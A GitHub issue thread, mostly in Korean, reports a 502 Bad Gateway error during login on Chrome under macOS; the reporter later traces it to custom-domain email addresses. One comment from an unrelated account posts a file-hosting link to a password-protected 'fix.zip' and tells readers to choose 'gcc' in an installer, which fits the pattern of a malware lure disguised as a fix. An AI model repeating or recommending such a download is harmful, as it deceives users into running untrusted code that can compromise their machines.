### ISSUE TITLE
[PC-Chrome-1920-로그인] 로그인 502 Bad Gateway 오류

### ISSUE THREAD

**Issue by Lcrescent3es** [100-hours-a-week/5-team-HRTH-ustock-be#109]
##  버그 설명

버그에 대한 명확하고 간결한 설명해주세요.

- 로그인 시 502 bad gateway가 표시된 것으로 추측중

## 재현하는 방법

동작을 재현하는 단계:

## 예상한 동작

예상했던 일에 대한 명확하고 간결한 설명해주세요.

- 로그인 정상작동

## 스크린샷 (옵션)

문제를 설명하는 데 도움이 되는 스크린샷을 추가하세요. 스크린샷으로 어렵다면 영상첨부해주세요.

<img width="624" alt="image" src="https://github.com/user-attachments/assets/5a18e231-c39f-40d3-a0df-cf2b9055496b">

## 데스크톱(다음 정보를 작성해 주세요):

- OS: MacOS(M1)
- Browser: Chrome

## 추가적인 내용 (옵션):

여기에 문제에 대한 다른 컨텍스트를 추가해주세요.

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lcrescent3es** [comment]
일회성 오류로 추측중, issue close 후 재발생시 원인 파악후 해결

**Comment by Lcrescent3es** [comment]
원인은 커스텀 도메인 이메일
